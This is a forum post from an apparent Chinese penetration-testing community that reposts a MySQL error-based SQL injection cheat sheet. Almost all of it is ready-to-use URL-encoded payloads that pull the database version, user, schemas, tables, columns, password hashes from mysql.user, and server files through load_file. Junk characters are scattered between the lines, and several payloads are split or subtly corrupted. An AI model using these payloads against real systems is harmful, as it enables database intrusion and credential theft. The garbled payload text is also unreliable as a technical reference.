中国网络渗透测试联盟
标题:
Mysql暴错注入参考(pdf)
[打印本页]
作者:
admin
时间:
2013-7-27 11:00
标题:
Mysql暴错注入参考(pdf)
本帖最后由 Nightmare 于 2013-3-17 14:20 编辑
2 |1 k7 o' P% I" U3 {. ?
6 b, x7 {4 e8 h8 l: f
4 C7 j$ S8 S2 W2 m
Mysql暴错注入参考(pdf),每天一贴。。。
' R" F4 S9 M$ p, f) Z# T
+ D8 S! R9 I+ l; n7 n
MySql Error Based Injection Reference
. }3 O5 [6 @2 w1 p% {* o) N
[Mysql暴错注入参考]
. V j: R+ h: q
Authornig0s1992
6 L3 _5 ^' n& b
Blog:
http://pnig0s1992.blog.51cto.com/
, B# i8 j4 {! U0 {9 }
TeAm:
http://www.FreeBuf.com/
. X7 [ V I: A- _+ _2 u
Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
* q2 r) Q* `! E' b7 Q
小部分版本使用name_const()时会报错.可以用给出的Method.2测试
# ?+ ]% C D4 R) Y; q9 `2 H& _
查询版本:
! `, n- n6 M! x& {
Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
* i( a+ }$ o4 k. z- R( l
join+(select+name_const(@@version,0))b)c)
8 m' Z5 \! {2 v4 S3 ]
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
- _% d' u8 e1 @1 ?! [& }
up by a)b)
- J6 [; l8 L+ ?. J/ m$ v
查询当前用户:
/ @8 k5 @1 B* f; q2 }
Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
! l6 j5 N( @( B% P0 v5 u8 e- Z
Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
. m4 c L1 {, J+ p% p) n' D+ v, ?
and(0)*2))x+from+information_schema.tables+group+by+x)a)
& e5 O2 r. i1 A2 @7 F% D
查询当前数据库:
6 I' d0 ]% y9 R5 k, R0 n3 A& M
Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
' I2 d+ p4 y- j: x) ~
Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
6 p! }) [" @. S
or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
# l Z5 }4 Z9 J& C1 i
依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
9 t7 Q J% y9 u" {
LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
* y; c+ v$ {, f3 K
顺序替换
1 K: |8 E6 Z4 b O3 D
爆指定库数目:
" X5 @0 p9 |& g7 s; H" p/ O# V
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
) H" e/ @7 A: V
able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
+ K3 E4 r7 h C) u8 Y& v
+by+x)a)+and+1=1 0x6D7973716C=mysql
' u: t* Z' i8 t# L
依次爆表:
; i* m# f# }. B) ]3 b
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
8 f. [. O7 n$ A1 k+ T8 A& v& S
able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
/ {! N# L. f) {" r( Z# o# |+ p
bles+group+by+x)a)+and+1=1
5 s2 H8 ?' y4 m4 S4 y" [9 v
0x6D7973716C=Mysql 将n顺序替换
* p; H8 C6 Y, t/ {* Q2 B
爆表内字段数目:
2 P! d7 l# c) a5 C1 i
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
1 U" x0 S+ f. k; ]7 O
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
+ h+ A9 g( H+ J) p# M, b
0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
6 L' ?3 p" R+ [0 `! c/ y
依次爆字段:
% o0 X- k; t3 @' ~3 X; [2 v7 Z
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
! b5 w8 C: Z1 p
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
) L- N3 I; h( a' X
loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1 将n顺序替换
" a" S' p' X9 e# @4 G8 x& N+ t8 N
依次暴内容:
" y2 v% S' L4 n# P+ S( h
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
* q! l& M1 i$ W# w! x
ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
6 G0 O7 }1 G* ?; W: {
将n顺序替换
6 p- W+ \+ r) t8 Y0 L; O
爆文件内容:
" T8 v0 S; M( c1 D; \: e# F
and+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
6 g$ N/ O, H/ E3 U, u9 {8 a( b
from+information_schema.tables+group+by+a)b)
' t+ s$ s' r; O9 D5 n: x2 |
0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
* ?- E* g$ U* O- R4 x) F
Thx for reading.
S2 n. D N q; t$ t
, k" j. h% O# t
不要下载也可以,
1 V' U4 t- `) I4 g' G& ^( A
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2